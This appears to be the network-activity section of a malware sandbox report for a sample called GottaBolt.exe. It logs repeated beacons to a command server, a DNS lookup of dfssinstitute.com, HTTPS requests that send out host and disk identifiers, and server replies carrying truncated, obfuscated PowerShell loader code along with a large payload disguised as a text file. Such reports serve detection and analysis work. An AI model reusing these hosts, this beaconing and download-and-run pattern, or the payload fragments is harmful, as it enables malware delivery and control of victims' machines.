Nov 22, 2024 17:13:45.399621010 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:45.519267082 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:47.524611950 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:47.644283056 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:49.649610996 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:49.771910906 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:49.831060886 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:49.868447065 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:49.988101959 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:51.993339062 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:52.113374949 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:54.118370056 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:54.238271952 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:56.259021044 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:56.385020018 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:58.399693966 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:58.520273924 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:00.524619102 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:00.648112059 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:02.649704933 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:02.769340038 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:04.748083115 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:04.790276051 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:04.790523052 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:04.910082102 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:06.915251017 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:07.035425901 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:09.040275097 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:09.160006046 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:11.165292025 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:11.284804106 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:13.290497065 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:13.410278082 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:15.415335894 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:15.539235115 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:17.540304899 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:17.660459995 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:19.665311098 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:19.754741907 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:19.785840988 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:19.790417910 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:19.910121918 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:21.915323019 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:22.034967899 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:24.040302992 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:24.163598061 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:26.165370941 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:26.285547018 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:28.290370941 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:28.410418034 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:30.415330887 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:30.535183907 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:32.540324926 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:32.660077095 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:34.665322065 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:34.760852098 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:34.790196896 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:34.805974007 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:34.806278944 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:34.925925970 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:36.930951118 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:37.050801039 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:39.056062937 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:39.175754070 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:41.181401968 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:41.301048994 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:43.306165934 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:43.427269936 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:45.436523914 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:45.556334972 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:47.555962086 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:47.680196047 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:49.763820887 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:49.821611881 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:51.821711063 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:51.941457033 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:54.134147882 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:54.254046917 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:56.430998087 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:56.555258989 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:14:58.618643999 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:14:58.740360975 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:15:00.931018114 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:15:01.050884008 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:15:03.118565083 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:15:03.243654013 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:15:04.769479036 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:15:04.931027889 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:15:06.931030035 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:15:07.051172018 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:15:09.118594885 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:15:09.242882013 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:15:11.321657896 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:15:11.441344976 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:15:13.618527889 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:15:13.738202095 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:15:14.728001118 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:15:14.848128080 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:15:16.852899075 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:15:16.972430944 CET	14000	49786	172.86.76.228	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2024 17:11:44.866642952 CET	55740	53	192.168.2.5	1.1.1.1
Nov 22, 2024 17:11:45.086390972 CET	53	55740	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 22, 2024 17:11:44.866642952 CET	192.168.2.5	1.1.1.1	0x2e6d	Standard query (0)	dfssinstitute.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 22, 2024 17:11:45.086390972 CET	1.1.1.1	192.168.2.5	0x2e6d	No error (0)	dfssinstitute.com		77.91.73.101	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

dfssinstitute.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49718	77.91.73.101	443	5760	C:\Users\user\Desktop\GottaBolt.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 16:11:46 UTC	162	OUT	GET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1 Host: dfssinstitute.com Connection: Keep-Alive
2024-11-22 16:11:47 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Nov 2024 16:11:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-22 16:11:47 UTC	42	IN	Data Raw: 31 66 0d 0a 57 72 69 74 65 2d 48 6f 73 74 20 22 78 3d 39 35 34 34 2c 79 3d 32 34 39 32 2c 20 78 2b 79 22 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fWrite-Host "x=9544,y=2492, x+y"0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49719	77.91.73.101	443	5760	C:\Users\user\Desktop\GottaBolt.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 16:11:49 UTC	138	OUT	GET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1 Host: dfssinstitute.com
2024-11-22 16:11:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Nov 2024 16:11:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-22 16:11:49 UTC	805	IN	Data Raw: 33 31 39 0d 0a 0d 0a 24 42 51 55 76 58 55 49 54 47 4a 44 48 57 6f 50 59 79 51 42 76 20 3d 20 24 4d 79 49 6e 76 6f 63 61 74 69 6f 6e 2e 4d 79 43 6f 6d 6d 61 6e 64 2e 4e 61 6d 65 20 2d 72 65 70 6c 61 63 65 20 22 2e 70 73 31 22 2c 22 22 0d 0a 24 66 6c 62 45 76 4f 6f 41 51 49 49 64 77 4f 6b 6b 5a 45 6b 57 20 3d 20 24 50 53 43 6f 6d 6d 61 6e 64 50 61 74 68 20 2d 72 65 70 6c 61 63 65 20 22 31 2e 70 73 31 22 2c 22 32 2e 70 73 31 22 20 0d 0a 24 66 6c 62 45 76 4f 6f 41 51 49 49 64 77 4f 6b 6b 5a 45 6b 57 32 20 3d 20 24 50 53 43 6f 6d 6d 61 6e 64 50 61 74 68 20 2d 72 65 70 6c 61 63 65 20 22 31 2e 70 73 31 22 2c 22 31 2e 74 78 74 22 0d 0a 0d 0a 74 72 79 7b 0d 0a 20 20 24 48 49 7a 57 56 73 68 58 70 55 52 41 58 45 68 57 58 41 6e 4d 20 3d 20 47 65 74 2d 53 63 68 65 64 Data Ascii: 319$BQUvXUITGJDHWoPYyQBv = $MyInvocation.MyCommand.Name -replace ".ps1",""$flbEvOoAQIIdwOkkZEkW = $PSCommandPath -replace "1.ps1","2.ps1" $flbEvOoAQIIdwOkkZEkW2 = $PSCommandPath -replace "1.ps1","1.txt"try{ $HIzWVshXpURAXEhWXAnM = Get-Sched

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49720	77.91.73.101	443	5760	C:\Users\user\Desktop\GottaBolt.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 16:11:51 UTC	138	OUT	GET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1 Host: dfssinstitute.com
2024-11-22 16:11:52 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Nov 2024 16:11:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-22 16:11:52 UTC	646	IN	Data Raw: 32 37 61 0d 0a 24 74 77 6b 6a 78 42 6d 79 67 4d 6b 78 61 77 53 61 44 69 67 62 20 3d 20 24 4d 79 49 6e 76 6f 63 61 74 69 6f 6e 2e 4d 79 43 6f 6d 6d 61 6e 64 2e 4e 61 6d 65 20 2d 72 65 70 6c 61 63 65 20 22 2e 70 73 31 22 2c 22 22 0d 0a 24 73 76 68 47 41 6b 78 73 62 46 64 47 75 6c 74 79 50 49 76 52 20 3d 20 24 66 61 6c 73 65 0d 0a 24 57 4f 59 73 62 79 65 53 70 44 4e 56 45 55 4d 55 41 75 45 68 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 54 68 72 65 61 64 69 6e 67 2e 45 76 65 6e 74 57 61 69 74 48 61 6e 64 6c 65 20 24 74 72 75 65 2c 20 28 5b 54 68 72 65 61 64 69 6e 67 2e 45 76 65 6e 74 52 65 73 65 74 4d 6f 64 65 5d 3a 3a 4d 61 6e 75 61 6c 52 65 73 65 74 29 2c 20 22 47 6c 6f 62 61 6c 5c 24 74 77 6b 6a 78 42 6d 79 67 4d 6b 78 61 77 53 61 44 69 67 62 22 2c 20 28 5b Data Ascii: 27a$twkjxBmygMkxawSaDigb = $MyInvocation.MyCommand.Name -replace ".ps1",""$svhGAkxsbFdGultyPIvR = $false$WOYsbyeSpDNVEUMUAuEh = New-Object Threading.EventWaitHandle $true, ([Threading.EventResetMode]::ManualReset), "Global\$twkjxBmygMkxawSaDigb", ([

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49722	77.91.73.101	443	5760	C:\Users\user\Desktop\GottaBolt.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 16:11:54 UTC	138	OUT	GET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1 Host: dfssinstitute.com
2024-11-22 16:11:54 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Nov 2024 16:11:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-22 16:11:54 UTC	4299	IN	Data Raw: 65 34 36 0d 0a 41 64 64 2d 54 79 70 65 20 2d 41 73 73 65 6d 62 6c 79 4e 61 6d 65 20 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 0d 0d 0a 41 64 64 2d 54 79 70 65 20 2d 41 73 73 65 6d 62 6c 79 4e 61 6d 65 20 53 79 73 74 65 6d 0d 0d 0a 0d 0d 0a 46 75 6e 63 74 69 6f 6e 20 76 6a 78 79 4c 70 4e 6b 6f 77 57 7a 78 6c 6f 62 56 41 69 69 20 7b 0d 0d 0a 5b 43 6d 64 6c 65 74 42 69 6e 64 69 6e 67 28 29 5d 0d 0d 0a 20 20 20 70 61 72 61 6d 28 0d 0d 0a 20 20 20 20 20 20 20 20 20 5b 50 61 72 61 6d 65 74 65 72 28 4d 61 6e 64 61 74 6f 72 79 3d 24 74 72 75 65 29 5d 20 5b 53 74 72 69 6e 67 5d 24 47 48 46 2c 0d 0d 0a 20 20 20 20 20 20 20 20 5b 50 61 72 61 6d 65 74 65 72 28 4d 61 6e 64 61 74 6f 72 79 3d 24 74 72 75 65 29 5d 20 5b 53 74 72 69 6e 67 5d 24 62 74 73 0d 0d 0a 20 20 20 Data Ascii: e46Add-Type -AssemblyName System.DrawingAdd-Type -AssemblyName SystemFunction vjxyLpNkowWzxlobVAii {[CmdletBinding()] param( [Parameter(Mandatory=$true)] [String]$GHF, [Parameter(Mandatory=$true)] [String]$bts

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49729	77.91.73.101	443	5760	C:\Users\user\Desktop\GottaBolt.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 16:11:56 UTC	138	OUT	GET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1 Host: dfssinstitute.com
2024-11-22 16:11:57 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Nov 2024 16:11:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-22 16:11:57 UTC	42	IN	Data Raw: 31 66 0d 0a 57 72 69 74 65 2d 48 6f 73 74 20 22 78 3d 31 36 32 33 2c 79 3d 36 34 34 36 2c 20 78 2b 79 22 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fWrite-Host "x=1623,y=6446, x+y"0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49744	77.91.73.101	443	4428	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 16:12:03 UTC	113	OUT	GET /?yjVsmHMwodfFGINSiCsv=YXuuqBFUVgMBaXsghdUv.txt HTTP/1.1 Host: dfssinstitute.com Connection: Keep-Alive
2024-11-22 16:12:03 UTC	293	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 22 Nov 2024 16:12:03 GMT Content-Type: application/octet-stream Content-Length: 7432853 Connection: close Content-Description: File Transfer Content-Disposition: attachment; filename="YXuuqBFUVgMBaXsghdUv.txt" Cache-Control: must-revalidate
2024-11-22 16:12:03 UTC	16091	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 c1 00 00 05 c1 08 06 00 00 00 55 2d 57 79 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 ff a5 49 44 41 54 78 5e 1c 9d 77 38 96 ff fb 87 55 4a 42 1a 4a 19 a5 25 44 a5 68 68 a2 81 a4 84 10 45 53 52 a1 a2 84 92 15 8a a2 ad 48 2a 89 c8 2e 25 1a a8 a4 3e 5a 22 ab 45 2a ca 48 88 9c bf fb fb fb cb f3 c7 83 fb be df d7 f5 7a 9d e7 e1 38 1e 22 1b a7 5a 11 bf 54 9c 11 dd a9 fc 9e bb 9a 53 0b 6f b3 c3 ee 19 31 0d e3 f9 f6 44 1a 91 af ca ac 91 ca e3 50 ca 1c de 8c b9 c0 54 eb 8b 88 bb d7 a0 f8 e4 2c 8e 1b af f3 7e b6 38 2d ff be 52 14 fc 96 67 df 33 98 fb b9 0f 0e e6 c6 38 6d 9f 45 9f be 32 84 3d d8 cf Data Ascii: PNGIHDRU-WysRGBgAMAapHYsodIDATx^w8UJBJ%DhhESRH.%>Z"EHz8"ZTSo1DPT,~8-Rg38mE2=
2024-11-22 16:12:04 UTC	16384	IN	Data Raw: c6 3a b5 37 3c dc 54 c9 9a 4c 0d 0c 32 b5 b8 b8 69 00 8b 56 a8 10 d4 37 9a c5 1a f6 e8 8f 2e a5 ef c5 bf 78 89 9f 60 87 5e 1d b9 db 0a 08 f9 54 c1 55 17 79 8a 0c 9e 61 2e be 9f 37 1f 35 f8 50 12 c6 3d 9f 2d b8 85 c7 f0 ed 6d 13 db c6 fa 11 1d ee 82 5e 7f 15 cc 4d b2 18 19 6f c6 b5 25 e1 42 f0 55 f2 fa f7 50 1e 9c f1 64 d7 b8 40 32 7e 3f 66 6b 6c 20 52 17 66 30 5c 10 c2 b0 11 7b 90 91 d9 82 d6 11 63 22 8d 0c 10 73 1b c5 8c 28 23 e6 4e ad e7 a5 d5 67 3a 9f bc 64 8f f9 3e 1c 6c 63 b1 db f7 8e ae f9 dd 94 7a 74 e2 7e 2f 09 d5 c5 cd 58 d4 bd a7 34 6c 1d 32 6f c6 b3 ee eb 56 6c fe 0e e6 e7 cc b3 54 1c ec cf c3 65 2a 48 cb 67 31 a5 58 82 b0 c0 3f 5c 9e ee 40 43 b8 0c e9 d7 3d b9 f0 6c 0e 63 2b 8d 18 71 69 3b 16 17 df 31 e9 e8 74 be aa cf e7 fe e6 33 24 4f 16 a7 Data Ascii: :7<TL2iV7.x`^TUya.75P=-m^Mo%BUPd@2~?fkl Rf0\{c"s(#Ng:d>lczt~/X4l2oVlTe*Hg1X?\@C=lc+qi;1t3$O
2024-11-22 16:12:04 UTC	16384	IN	Data Raw: 6b 87 f1 dd c0 9a e5 12 77 69 97 28 22 59 cd 8d af 23 ae a2 a7 56 c0 09 9f f5 cc c9 5e 4c 49 d4 28 fc f5 bf 52 24 66 c7 cc 1f 2f 38 33 c6 1a 89 60 27 74 96 74 51 60 a4 2b b0 8b 19 ae fd 67 f2 5a 52 0e d9 f3 35 6c 69 0c e4 ed c1 e1 8c 95 a8 c0 a6 de 1d db aa 2c 9a 3e 9c 22 54 65 18 8e 87 57 f0 a1 cb 9c fb 3b 9b f0 d7 91 66 f6 ec dd 84 5f 6a 42 43 a4 83 d4 e9 f5 18 bd eb c3 d4 b5 5b b1 38 b6 89 f7 95 c5 fc 9e 7b 9f f9 73 97 f3 e3 4e 0d 59 ca 06 58 d4 0d c0 67 d2 34 16 49 e5 09 f3 77 8c 46 37 53 6c 22 a7 21 b5 f3 10 91 d5 5b f8 ac ac c7 c2 b8 18 de bf 39 c6 34 83 e1 0c 9a 97 40 ea bf 5b 38 05 17 30 f9 90 00 9e 9d 87 88 10 29 67 f5 bf 20 96 8b 09 f9 d7 be 8b d0 f1 f1 2c be f8 99 a0 40 2d 86 b8 de e2 72 f8 06 2e d4 c6 93 f2 77 2e 7d 9e 84 51 61 39 1f 85 df 3d Data Ascii: kwi("Y#V^LI(R$f/83`'ttQ`+gZR5li,>"TeW;f_jBC[8{sNYXg4IwF7Sl"![94@[80)g ,@-r.w.}Qa9=
2024-11-22 16:12:04 UTC	16384	IN	Data Raw: 11 44 de 8e 28 9e 7e 5a cb c0 33 c2 b3 e9 c9 a4 e9 52 18 a5 8f 0f 23 fe 7c 35 f7 5e 08 2c 35 62 3a b5 c1 2f 28 98 67 88 75 58 3f 2c 96 2c 64 ab e0 11 81 aa b5 42 56 de 23 d1 51 15 bd ed aa 42 9e 08 1c f7 27 9c 2d b7 e6 30 a0 bf 09 0f db cb 90 15 fa 3b b3 50 97 c2 07 ae bc 8f 94 61 6c f4 3f 6c 0a 66 31 73 f2 5f e1 5a b5 30 ec ab 4c bb d9 77 a1 ab a4 f1 5b d2 8e d9 c5 6a a6 52 84 e1 ec 68 3e 97 d9 62 ab de 44 de 85 d3 4c 5c 95 81 67 9d 2d ab 62 76 32 ee 49 2e 0e bb 7c b9 66 f4 84 bd 92 96 dc 35 8a c0 39 75 39 fa b5 7e 84 6f bf 42 df c7 6b 18 52 f4 98 9d 2b 74 b8 b3 a6 0f 13 14 77 51 96 a0 ca 9b 63 83 58 65 29 ca 76 af 10 66 8f 19 c8 8e d0 3e 20 cc b6 fd 6b 57 a4 9f 6f 42 e3 63 09 7c 14 a5 ba 70 3c 8b f4 dc 89 ca 48 66 50 a7 09 fb ba 3d c8 4d 68 65 58 c7 23 Data Ascii: D(~Z3R#\|5^,5b:/(guX?,,dBV#QB'-0;Pal?lf1s_Z0Lw[jRh>bDL\g-bv2I.\|f59u9~oBkR+twQcXe)vf> kWoBc\|p<HfP=MheX#
2024-11-22 16:12:04 UTC	16384	IN	Data Raw: 64 9d fa 26 b4 9e 74 e3 71 77 20 e2 db 24 f9 da 23 60 fd 3d 92 2c 2b f2 e4 98 f0 11 6a 34 2f b3 45 ff 36 53 fe bd c1 c4 d7 8a 1b 53 27 22 fb a4 91 6b da a9 b4 bd f4 c3 c5 b0 9c 74 05 2d 76 ae ee e3 c8 94 2f 82 dd bd 9c ad 6b 36 a0 72 d5 1f b3 87 c2 5c fa f5 89 bf 3a 87 f9 b1 f9 29 8d 7b 6e d2 39 ff 05 9f 2a c3 50 70 e8 e6 4f 5c 23 91 d7 1b b8 3d e5 08 47 64 c3 68 98 e8 4f f5 ef 83 8c fb e5 c6 5e 4d 37 9a b4 c7 f3 ec cf 6f 3a f2 ee 71 f2 7d 07 fa a1 69 7c d2 d9 c1 d8 f5 67 c8 5d 3e 1f 17 8b 42 b2 94 62 b1 6c ff 84 c5 c6 1b d4 04 77 f2 31 f8 2a 95 89 65 a4 18 cd e6 b6 8e 1f 1f 27 39 30 db a1 99 cb 6a 91 08 05 fc 66 88 d3 5c 54 9e 97 92 28 5f 4a 81 eb 59 7a 3a d6 e2 72 69 36 e5 93 23 b9 5e b2 81 4d 87 27 e0 69 6d 81 f8 f1 65 14 bd 7f 8a b3 82 60 3f e4 9f e4 Data Ascii: d&tqw $#`=,+j4/E6SS'"kt-v/k6r\:){n9PpO\#=GdhO^M7o:q}i\|g]>Bblw1e'90jf\T(_JYz:ri6#^M'ime`?
2024-11-22 16:12:04 UTC	16384	IN	Data Raw: fc 12 ba 9f d2 d0 f3 7d c6 da 97 82 41 be bc 54 70 ae b3 90 0d 17 dc bf 50 15 33 75 c4 89 f1 2d e2 64 ca 28 8e 78 c4 a2 b9 42 9e 15 e9 d9 1c aa 96 e1 de dd 27 1c ed 98 89 5b 9e 07 6f c6 af 43 71 a0 28 b9 13 ec e8 29 b2 c4 61 45 15 b5 e3 ba 48 f8 3c 86 4a 3f 43 ae 04 9d 62 e8 b5 af 78 47 ee 25 e5 60 1b d2 12 65 d8 6b fb e0 f8 ee 17 d2 ff 9a b8 3c 64 38 71 eb 02 68 12 88 c2 b9 a3 4b d8 f3 36 95 a8 f3 eb 28 f8 9f 54 e9 9a 70 ab 28 9e 22 2f 4f 46 95 44 31 c7 62 84 40 8c 5d b8 bf 4f 85 f9 d7 86 b3 58 5d 9c 1a e1 5b ac f9 5b c5 30 6d 67 ce 3d 8f 45 e4 d7 3d 9e 9b 89 91 b8 c0 9f b7 b6 a2 54 b5 e4 52 3d 44 8d d4 e9 a2 78 cc eb c0 54 f8 07 0a e2 a3 08 1a 73 92 01 7f fb 60 ad 1d cb 92 d5 50 fa f7 40 00 81 5f 91 98 b3 0e a1 55 ef e8 92 6a 60 55 5f 91 a0 ae ab e9 4a Data Ascii: }ATpP3u-d(xB'[oCq()aEH<J?CbxG%`ek<d8qhK6(Tp("/OFD1b@]OX][[0mg=E=TR=DxTs`P@_Uj`U_J
2024-11-22 16:12:04 UTC	16384	IN	Data Raw: 3b fb 22 9d dd 4a 63 c4 42 ee fd 3c 43 ae d8 5f 36 a7 ec a6 52 34 92 7e 9f 87 13 32 a0 86 34 1b 7b ac 55 e7 61 79 f5 34 93 07 8f e6 cd 91 68 b6 38 d9 a1 91 d9 40 f9 9b 8d 48 49 5e 63 63 98 35 33 ef 1d 67 50 de 71 be f6 b3 e0 d0 a5 65 2c 96 2b e0 f6 50 4b 96 14 f6 b0 7c bd 15 1d 59 0d 74 3c 9f 4a cd c6 c1 a8 78 4a 62 d2 28 c2 b0 2b f9 98 3d c8 c2 a5 38 87 4c ff a3 4c 7a f1 00 5b f9 33 6c 3a b4 06 75 b9 59 02 98 17 f1 7e eb 6f be 9d b8 4d c3 99 43 8c b0 bd cc 99 ce a7 6c 78 2a c6 fa 24 7f 64 05 11 f9 63 ed 4c ae 47 21 bf 9e ac c2 22 78 31 87 27 ce e1 ed a5 b5 b8 1c 99 47 8a 82 39 01 12 79 18 26 58 22 7f 36 89 15 b2 bb 38 16 65 c1 8c d8 75 44 39 cb d3 31 af 41 80 39 1d e6 d7 5f 61 d6 64 69 36 af d0 63 da 58 7f 8c 6a e4 e9 79 5c c5 8f a4 04 c4 cd ec 08 1c e5 Data Ascii: ;"JcB<C_6R4~24{Uay4h8@HI^cc53gPqe,+PK\|Yt<JxJb(+=8LLz[3l:uY~oMClx*$dcLG!"x1'G9y&X"68euD91A9_adi6cXjy\
